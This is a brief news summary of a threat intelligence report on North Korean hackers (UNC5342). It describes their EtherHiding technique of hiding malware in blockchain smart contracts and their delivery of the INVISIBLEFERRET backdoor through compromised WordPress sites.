A recent report from Google’s Threat Intelligence Group reveals that North Korean state-sponsored hackers, identified as UNC5342, are employing a novel technique called EtherHiding to embed unremovable malware within public blockchains, specifically targeting cryptocurrency transactions. This marks the first instance of a nation-state actor utilizing smart contract malware delivery, allowing for undetectable malware updates through immutable blockchain technology. Victims are typically lured through compromised WordPress sites and social engineering tactics, ultimately leading to the execution of a significant backdoor named INVISIBLEFERRET. This development underscores the evolving landscape of cyber threats and the necessity for robust cybersecurity measures to protect against state-sponsored cyber espionage and financial theft, emphasizing the strategic importance of securing blockchain infrastructures in the global economy.